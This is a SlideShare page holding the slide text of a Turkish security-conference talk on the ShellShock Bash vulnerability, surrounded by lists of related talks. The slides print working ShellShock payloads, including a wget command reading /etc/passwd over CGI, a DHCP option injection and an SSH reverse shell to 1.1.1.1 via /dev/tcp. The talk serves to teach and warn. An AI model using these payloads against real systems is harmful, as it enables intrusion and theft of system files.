Submit Search
Upload
IstSec'14 - Onur ALANBEL - ShellShock
•
6 likes
•
2,885 views
BGA Cyber Security
Follow
IstSec'14 Bilgi Güvenliği Konferansı Sunumları
Read less
Read more
Technology
Report
Share
Report
Share
1 of 22
Recommended
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
BGA Cyber Security
Developing MIPS Exploits to Hack Routers
Developing MIPS Exploits to Hack Routers
BGA Cyber Security
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
CODE BLUE
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
CODE BLUE
Securing Hadoop with OSSEC
Securing Hadoop with OSSEC
Vic Hargrave
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
Passive Fingerprinting of HTTP/2 Clients by Ory Segal
Passive Fingerprinting of HTTP/2 Clients by Ory Segal
CODE BLUE
Recommended
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
BGA Cyber Security
Developing MIPS Exploits to Hack Routers
Developing MIPS Exploits to Hack Routers
BGA Cyber Security
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
CODE BLUE
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
CODE BLUE
Securing Hadoop with OSSEC
Securing Hadoop with OSSEC
Vic Hargrave
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
Passive Fingerprinting of HTTP/2 Clients by Ory Segal
Passive Fingerprinting of HTTP/2 Clients by Ory Segal
CODE BLUE
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
Server hardening
Server hardening
Teja Babu
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix Linux
Security Session
NexusでAnsibleやってみた
NexusでAnsibleやってみた
Takehiro Yokoishi
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
Denis Kolegov
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
Packet Inspection on ASA
Packet Inspection on ASA
Pratik Bhide
Security Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and Results
Igor Beliaiev
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
Hacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
wremes
CentOS Linux Server Hardening
CentOS Linux Server Hardening
MyOwn Telco
Spider Setup with AWS/sandbox
Spider Setup with AWS/sandbox
I Goo Lee
Nikto
Nikto
Sorina Chirilă
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
Vpn site to site 2 asa qua gpon ftth thực tế
Vpn site to site 2 asa qua gpon ftth thực tế
laonap166
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
Michael Man
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2
Hell19
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
BGA Cyber Security
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
CypSec - Siber Güvenlik Konferansı
More Related Content
What's hot
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
Server hardening
Server hardening
Teja Babu
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix Linux
Security Session
NexusでAnsibleやってみた
NexusでAnsibleやってみた
Takehiro Yokoishi
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
Denis Kolegov
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
Packet Inspection on ASA
Packet Inspection on ASA
Pratik Bhide
Security Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and Results
Igor Beliaiev
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
Hacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
wremes
CentOS Linux Server Hardening
CentOS Linux Server Hardening
MyOwn Telco
Spider Setup with AWS/sandbox
Spider Setup with AWS/sandbox
I Goo Lee
Nikto
Nikto
Sorina Chirilă
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
Vpn site to site 2 asa qua gpon ftth thực tế
Vpn site to site 2 asa qua gpon ftth thực tế
laonap166
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
Michael Man
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2
Hell19
What's hot
(20)
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Server hardening
Server hardening
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix Linux
NexusでAnsibleやってみた
NexusでAnsibleやってみた
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
Packet Inspection on ASA
Packet Inspection on ASA
Security Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and Results
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Hacking the swisscom modem
Hacking the swisscom modem
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
CentOS Linux Server Hardening
CentOS Linux Server Hardening
Spider Setup with AWS/sandbox
Spider Setup with AWS/sandbox
Nikto
Nikto
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
Vpn site to site 2 asa qua gpon ftth thực tế
Vpn site to site 2 asa qua gpon ftth thực tế
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2
Viewers also liked
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
BGA Cyber Security
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
CypSec - Siber Güvenlik Konferansı
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
Java Shellcode Execution
Java Shellcode Execution
Ryan Wincey
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Z Chen
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
Talking about exploit writing
Talking about exploit writing
sbha0909
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
Software Exploits
Software Exploits
KevinCSmallwood
Viewers also liked
(20)
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
IstSec'14 - Kenan ABDULLAHOĞLU - BitCoin
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Linux Shellcode disassembling
Linux Shellcode disassembling
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Java Shellcode Execution
Java Shellcode Execution
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Talking about exploit writing
Talking about exploit writing
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Software Exploits
Software Exploits
Similar to IstSec'14 - Onur ALANBEL - ShellShock
Shellshock
Shellshock
Onur Alanbel
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
Consul administration at scale
Consul administration at scale
Pierre Souchay
Intrusion Techniques
Intrusion Techniques
Festival Software Livre
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
defcon_kz
Shellshock - A Software Bug
Shellshock - A Software Bug
vwchu
Romulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Chris Sistrunk
How to measure your security response readiness?
How to measure your security response readiness?
Tomasz Jakubowski
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
2014 04-17 Applied SCAP, Red Hat Summit 2014
2014 04-17 Applied SCAP, Red Hat Summit 2014
Shawn Wells
(In) Security graph database in real world
(In) Security graph database in real world
Miguel Hernández Boza
Automating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore Meetup
Matt Ray
Top 10 secure boot mistakes
Top 10 secure boot mistakes
Justin Black
Cloud Security Hardening та аудит хмарної безпеки за допомогою Scout Suite
Cloud Security Hardening та аудит хмарної безпеки за допомогою Scout Suite
OWASP Kyiv
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
Jason Choi
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
BMC Discovery (ADDM) Cheat Sheet by Traversys Limited
BMC Discovery (ADDM) Cheat Sheet by Traversys Limited
Wes Moskal-Fitzpatrick
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
Similar to IstSec'14 - Onur ALANBEL - ShellShock
(20)
Shellshock
Shellshock
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Consul administration at scale
Consul administration at scale
Intrusion Techniques
Intrusion Techniques
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
Shellshock - A Software Bug
Shellshock - A Software Bug
Romulus OWASP
Romulus OWASP
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
How to measure your security response readiness?
How to measure your security response readiness?
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
2014 04-17 Applied SCAP, Red Hat Summit 2014
2014 04-17 Applied SCAP, Red Hat Summit 2014
(In) Security graph database in real world
(In) Security graph database in real world
Automating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore Meetup
Top 10 secure boot mistakes
Top 10 secure boot mistakes
Cloud Security Hardening та аудит хмарної безпеки за допомогою Scout Suite
Cloud Security Hardening та аудит хмарної безпеки за допомогою Scout Suite
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
What should I do when my website got hack?
What should I do when my website got hack?
BMC Discovery (ADDM) Cheat Sheet by Traversys Limited
BMC Discovery (ADDM) Cheat Sheet by Traversys Limited
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
More from BGA Cyber Security
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
BGA Cyber Security
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
BGA Cyber Security
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
BGA Cyber Security
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
BGA Cyber Security
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
BGA Cyber Security
Webinar: Popüler black marketler
Webinar: Popüler black marketler
BGA Cyber Security
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
BGA Cyber Security
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
BGA Cyber Security
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
BGA Cyber Security
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
BGA Cyber Security
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
BGA Cyber Security
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
BGA Cyber Security
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
BGA Cyber Security
Open Source SOC Kurulumu
Open Source SOC Kurulumu
BGA Cyber Security
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
BGA Cyber Security
Siber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
BGA Cyber Security
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Cyber Security
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
BGA Cyber Security
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
BGA Cyber Security
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
BGA Cyber Security
More from BGA Cyber Security
(20)
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Webinar: Popüler black marketler
Webinar: Popüler black marketler
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
Open Source SOC Kurulumu
Open Source SOC Kurulumu
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
Siber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Recently uploaded
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
HarshalMandlekar2
Training state-of-the-art general text embedding
Training state-of-the-art general text embedding
Zilliz
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
LoriGlavin3
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
LoriGlavin3
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
BookNet Canada
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
Nicole Novielli
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
Stephanie Beckett
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
LoriGlavin3
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
Dilum Bandara
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
MounikaPolabathina
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
Pixlogix Infotech
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
Fwdays
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
Lorenzo Miniero
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
Raghuram Pandurangan
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
BookNet Canada
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
Manik S Magar
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
Hervé Boutemy
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
Fwdays
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
Lonnie McRorey
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
Rick Flair
Recently uploaded
(20)
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
Training state-of-the-art general text embedding
Training state-of-the-art general text embedding
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
IstSec'14 - Onur ALANBEL - ShellShock
1.
SHELLSHOCK Onur ALANBEL
BGA Bilgi Güvenliği onur.alanbel@bga.com.tr
2.
env t=‘() {
:;}; whoami;’ bash -c date • Uygulama Güvenliği Uzmanı • Zararlı Yazılım Analizi
3.
Bash Nedir? •
Linux • BSD • OS X • Cygwin
4.
İnteraktif ? •
/bin/sh • /bin/bash • /bin/dash • /bin/ash • /bin/zsh
5.
Etkisi • CVSS
Severity (version 2.0): • CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend) • Impact Subscore: 10.0 • Exploitability Subscore: 10.0 • CVSS Version 2 Metrics: • Access Vector: Network exploitable • Access Complexity: Low • Authentication: Not required to exploit • Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service
6.
Zafiyet Olarak Keşfi
• Stephane CHAZELAS http://seclists.org/oss-sec/2014/q4/92 onur@ubuntu:~$ env t='() { :;}; echo vulnerable' bash -c 'echo ignore' vulnerable ignore
7.
Zaman Çizelgesi •
Bash 1.03 by Brain Fox - 01.09.1989 • CVE-2014-6271 - 24.09.2014 • CVE-2014-7169 - 26.09.2014 • CVE-2014-7186 - 01.10.2014 • CVE-2014-7187 - 01.10.2014 • CVE-2014-6277 - 02.10.2014 • CVE-2014-6278 - 05.10.2014
8.
Test Betikleri •
https://raw.githubusercontent.com/hannob/ bashcheck/master/bashcheck • https://github.com/wreiske/shellshocker/
9.
Veri ve Kodun
Ayrılığı • Bellek Taşması • SQLi • XSS • Dosya İçe Aktarma • Fonksiyon İçe Aktarma
10.
Atak Vektörleri •
CGI • DHCP • SSH • SMTP • SUID/GUID Bits
11.
CGI • wget
-U "() { :;};echo;echo; /bin/cat /etc/passwd" http://172.16.63.164/cgi-bin/ss1.sh • () { :} echo echo /bin/cat /etc/passwd
12.
DHCP • interface=eth0
dhcp-range=192.168.18.15,192.168.18.20,12h dhcp-option-force=110,() { :; }; echo ‘bummm!' • dnsmasq
13.
SSH • ssh
git@gitlabserver.com ‘() { :;}; /bin/bash -i >& / dev/tcp/1.1.1.1/8118 0 >&1’
14.
SMTP • 220
localhost.localdomain ESMTP Postfix ehlo me 250-localhost.localdomain …. mail from:<test@bga.com.tr> rcpt to:<test@bga.com.tr> To: () { i;}; /bin/ -c ‘mail -s hello <info@bga.com.tr>’ … • http://www.exploit-db.com/exploits/34896/
15.
SUID/GUID • ls
-ls /Applications/VMware Fusion.app/ Contents/Library/vmware-vmx-stats 50848 -rwsr-xr-x@ 1 root wheel 26033264 Sep 5 01:38 /Applications/VMware Fusion.app/Contents/Library/vmware-vmx-stats
16.
Windows? • set
t=nop^&ping -n 1 bga.com.tr echo %t%
17.
Bilinen Ataklar •
Botnetler (MMD-0027-2014) • Worms (Kaspersky) • Yahoo (dip4.gq1.yahoo.com)
18.
Botnetler
19.
Wormlar
20.
Yahoo
21.
BGA • 180.186.121.254
- - [14/Oct/2014:21:51:58 +0300] "GET /cgi-bin/userreg.cgi HTTP/1.1" 404 480 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:57 +0300] "GET /cgi-bin/webmail.cgi HTTP/1.1" 404 480 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:57 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 404 478 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:57 +0300] "GET /cgi-bin/content.cgi HTTP/1.1" 404 480 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:56 +0300] "GET /cgi-bin/viewcontent.cgi HTTP/1.1" 404 484 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:56 +0300] "GET /cgi-bin/details.cgi HTTP/1.1" 404 480 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:54 +0300] "GET /cgi-bin/vidredirect.cgi HTTP/1.1" 404 484 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:53 +0300] "GET /cgi-bin/about.cgi HTTP/1.1" 404 478 "-" "() { :;}; echo `echo xbash:test`" • 